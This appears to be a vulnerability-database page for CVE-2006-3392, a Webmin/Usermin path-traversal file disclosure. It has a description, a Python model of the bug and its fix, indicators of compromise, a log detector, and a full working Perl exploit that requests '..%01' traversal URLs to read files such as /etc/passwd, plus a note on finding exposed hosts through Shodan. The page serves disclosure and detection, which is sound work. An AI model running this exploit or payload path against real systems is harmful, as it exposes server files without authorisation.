CVE-2006-3392
Published: 2006-07-06
Priority: P3 (51) · Severity: medium · CVSS 2.0 base score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Exploit: public · EPSS: 77.95% (99.5th percentile)
Webmin before 1.290 and Usermin before 1.220 call the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences: the removal of "../" sequences runs before bytes such as "%01" are removed from the filename, so a "..%01" component survives the check and only collapses to ".." afterwards. NOTE: This is a different issue than CVE-2006-3274.
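The ordering bug described above, modelled in Python as an added example. This is not Webmin's miniserv code: simplify_path, strip_control_bytes and the WEBROOT value are simplified stand-ins for the steps the CVE text names. It shows why a plain "../" traversal is stripped while "..%01" survives the check and becomes ".." once the path is decoded and the control byte is dropped, and what the hardened ordering looks like.

```python
# Added model of CVE-2006-3392's ordering bug; not Webmin's own code.
import posixpath
from urllib.parse import unquote

WEBROOT = "/usr/share/webmin"   # assumed document root for this model


def simplify_path(path: str) -> str:
    """Stand-in for Webmin's simplify_path: drop '', '.' and exact '..' components.
    A component such as '..%01' (or '..\\x01') is not '..' and therefore survives."""
    parts = [p for p in path.split("/") if p not in ("", ".", "..")]
    return "/" + "/".join(parts)


def strip_control_bytes(path: str) -> str:
    """Stand-in for the later step the CVE text mentions: bytes such as \\x01 are removed."""
    return "".join(ch for ch in path if ord(ch) >= 0x20)


def resolve(path: str) -> str:
    """What the OS ends up opening: WEBROOT joined with the path, '..' honoured."""
    return posixpath.normpath(WEBROOT + path)


def vulnerable_resolve(url_path: str) -> str:
    """Affected ordering: simplify first, decode and strip afterwards."""
    p = simplify_path(url_path)   # '..%01' components pass through untouched
    p = unquote(p)                # '..%01' -> '..\x01'
    p = strip_control_bytes(p)    # '..\x01' -> '..'  (the traversal reappears here)
    return resolve(p)


def fixed_resolve(url_path: str) -> str:
    """Hardened ordering: decode and strip first, canonicalise last, then enforce the root."""
    p = simplify_path(strip_control_bytes(unquote(url_path)))
    full = resolve(p)
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        raise PermissionError(f"path escapes {WEBROOT}: {full}")
    return full


def exploit_path(depth: int = 40, target: str = "/etc/passwd") -> str:
    """The public PoC's request path: '..%01' repeated `depth` times under /unauthenticated/."""
    return "/unauthenticated" + "/..%01" * depth + target


if __name__ == "__main__":
    plain = "/unauthenticated/../../../../etc/passwd"
    print("plain '../' (vulnerable order):", vulnerable_resolve(plain))           # stays in WEBROOT
    print("'..%01'     (vulnerable order):", vulnerable_resolve(exploit_path()))  # /etc/passwd
    print("'..%01'     (fixed order)     :", fixed_resolve(exploit_path()))       # contained
```

The root check in fixed_resolve is defence in depth: even if some future encoding slipped past simplify_path, a resolved path outside WEBROOT is refused rather than opened.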
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| usermin | usermin | <= 1.210 | 1.220 |
| webmin | webmin | <= 1.280 | 1.290 |
Detection & IOCs (extracted from sources)
URL path: /unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
Byte sequence: ..%01
- Look for HTTP GET requests targeting the '/unauthenticated/' path that contain '..%01' sequences: this is the encoded traversal that escapes the directory restriction because simplify_path runs before the path is decoded.
- The public exploit repeats '..%01' 40 times in the URL path so that the traversal reaches the filesystem root regardless of the working directory depth.
- No authentication is required; monitor for unauthenticated requests to Webmin/Usermin containing percent-encoded traversal sequences in the URL.
- Successful exploitation returns the file contents (e.g. /etc/passwd) in an HTTP 200 response body; match the body against 'root:.*:0:0:' to confirm exploitation.
- Shodan/FOFA fingerprinting for exposed Webmin instances can use the title 'webmin' to identify potentially vulnerable targets.
- Only Webmin before 1.290 and Usermin before 1.220 are affected; patched versions are not exploitable via this technique.
- This is a distinct issue from CVE-2006-3274; detection rules should not conflate the two even though both concern Webmin path handling.
- The exploit works over both HTTP and HTTPS; detection must cover both protocols on the Webmin/Usermin listening port (default 10000).
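The detection logic in the list above, written out as an added example and run over constructed log lines. It is not a rule from any of the page's sources; it assumes Common Log Format access lines (Webmin's own log format may differ) and, because the CVE text says "bytes such as %01", it goes beyond the single '..%01' instance and flags any '..' component followed by a percent-encoded control byte (%00 to %1f).

```python
# Added example: detector for the CVE-2006-3392 IOCs over constructed log lines.
# Not a rule from the page's sources; Common Log Format is assumed.
import re
from typing import Dict, List

# A '..' component followed by a percent-encoded control byte. The page's IOC is '..%01';
# this generalises to the other control bytes the CVE text alludes to ("bytes such as %01").
TRAVERSAL_RE = re.compile(r"/\.\.%[01][0-9a-fA-F]")

# Common Log Format line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# The /etc/passwd root entry, the confirmation pattern given in the IOC list.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)

# Constructed sample lines (not captured traffic): a 40-deep PoC hit, a benign static file,
# a plain '../' attempt (defeated by the '../' stripping, so not this CVE) and a '..%01'
# request for /etc/shadow.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [06/Jul/2006:10:21:04 +0000] "GET /unauthenticated/'
    + "/".join(["..%01"] * 40) + '/etc/passwd HTTP/1.1" 200 1187',
    '198.51.100.7 - - [06/Jul/2006:10:21:05 +0000] "GET /unauthenticated/style.css HTTP/1.1" 200 2311',
    '203.0.113.9 - - [06/Jul/2006:10:22:11 +0000] "GET /unauthenticated/../../../../etc/passwd HTTP/1.1" 404 312',
    '203.0.113.9 - - [06/Jul/2006:10:22:30 +0000] "GET /unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow HTTP/1.1" 200 702',
])


def requested_file(path: str) -> str:
    """Drop the prefix and every traversal component, leaving the file the attacker asked for."""
    tail = TRAVERSAL_RE.split(path)[-1]
    return tail if tail.startswith("/") else "/" + tail


def is_cve_2006_3392_request(method: str, path: str) -> bool:
    """The IOC: a GET under /unauthenticated/ whose path carries a '..%XX' control-byte component."""
    return (
        method == "GET"
        and path.startswith("/unauthenticated/")
        and TRAVERSAL_RE.search(path) is not None
    )


def scan_log(text: str) -> List[Dict[str, str]]:
    """One finding per matching request; an HTTP 200 means the traversal most likely succeeded."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the whole pass
        if not is_cve_2006_3392_request(m["method"], m["path"]):
            continue
        findings.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "target": requested_file(m["path"]),
            "depth": str(len(TRAVERSAL_RE.findall(m["path"]))),
            "status": m["status"],
            "likely_success": "yes" if m["status"] == "200" else "no",
        })
    return findings


def response_leaks_passwd(body: str) -> bool:
    """Confirm exploitation from a captured response body with the page's 'root:.*:0:0:' check."""
    return PASSWD_RE.search(body) is not None


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(response_leaks_passwd("root:x:0:0:root:/root:/bin/bash\n"))
```

Run it against both the HTTP and HTTPS listener logs (default port 10000), since the request path is identical over either scheme; the 404 on the plain '../' line is the patched behaviour and is deliberately not reported.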
No detection rules found.
Exploit-DB (2006-07-15): Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Exploit (Perl; the page's copy was cut off after the HTTP branch, so the header, the usage check and the HTTPS case named in the usage text are reconstructed here):
#!/usr/bin/perl
# Webmin < 1.290 / Usermin < 1.220 arbitrary file disclosure (CVE-2006-3392), coded by UmZ.
# LWP::Simple provides get(); the HTTPS case additionally needs LWP::Protocol::https installed.
use LWP::Simple;

if (@ARGV < 4) {
    # Usage line reconstructed: the extraction dropped the argument names.
    print("Usage: $0 <target> <port> <file> <0|1>\n");
    print("TARGETS are\n ");
    print("0 - > HTTP \n");
    print(" 1 - > HTTPS\n");
    print("Define full path with file name \n");
    print("Example: ./webmin.pl blah.com 10000 /etc/passwd 0\n");   # fourth argument is required
    exit(1);
}
($target, $port, $filename, $tar) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
# 40 "..%01" components: simplify_path() leaves them alone, and once the path is decoded
# and the %01 byte stripped each one is a plain "..", enough to reach / from any depth.
$temp = "/..%01" x 40;
# Scheme from the fourth argument; the request is otherwise identical over HTTP and HTTPS.
$scheme = ($tar == 1) ? "https" : "http";
my $url = "$scheme://" . $target . ":" . $port . "/unauthenticated/" . $temp . $filename;
$content = get $url;
defined $content or die "Request to $url failed\n";
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print($content);
print("\n -----------------------------------\n");
Metasploit: Webmin File Disclosure
A vulnerability has been reported in Webmin and Usermin which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused by an unspecified error in the handling of a URL. It can be exploited to read the contents of any file on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).
Nuclei (CVSS 5.0, severity medium)
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files; exploitation requires sending crafted '..%01' sequences.
Template:
id: CVE-2006-3392
info:
name: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
author: s4e-io
severity: medium
description: |
Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files, exploit requires sending crafted '..%01' sequences.
impact: |
Attackers can read arbitrary files on the server, potentially exposing sensitive information.
remediation
No writeups or analysis indexed.
References:
- http://attrition.org/pipermail/vim/2006-July/000923.html
- http://attrition.org/pipermail/vim/2006-June/000912.html
- http://secunia.com/advisories/20892
- http://secunia.com/advisories/21105
- http://secunia.com/advisories/21365
- http://secunia.com/advisories/22556
- http://security.gentoo.org/glsa/glsa-200608-11.xml
- http://www.debian.org/security/2006/dsa-1199
- http://www.kb.cert.org/vuls/id/999601
- http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
- http://www.osvdb.org/26772
- http://www.securityfocus.com/archive/1/439653/100/0/threaded
- http://www.securityfocus.com/archive/1/440125/100/0/threaded
- http://www.securityfocus.com/archive/1/440466/100/0/threaded
- http://www.securityfocus.com/archive/1/440493/100/0/threaded
- http://www.securityfocus.com/bid/18744
- http://www.vupen.com/english/advisories/2006/2612
- http://www.webmin.com/changes.html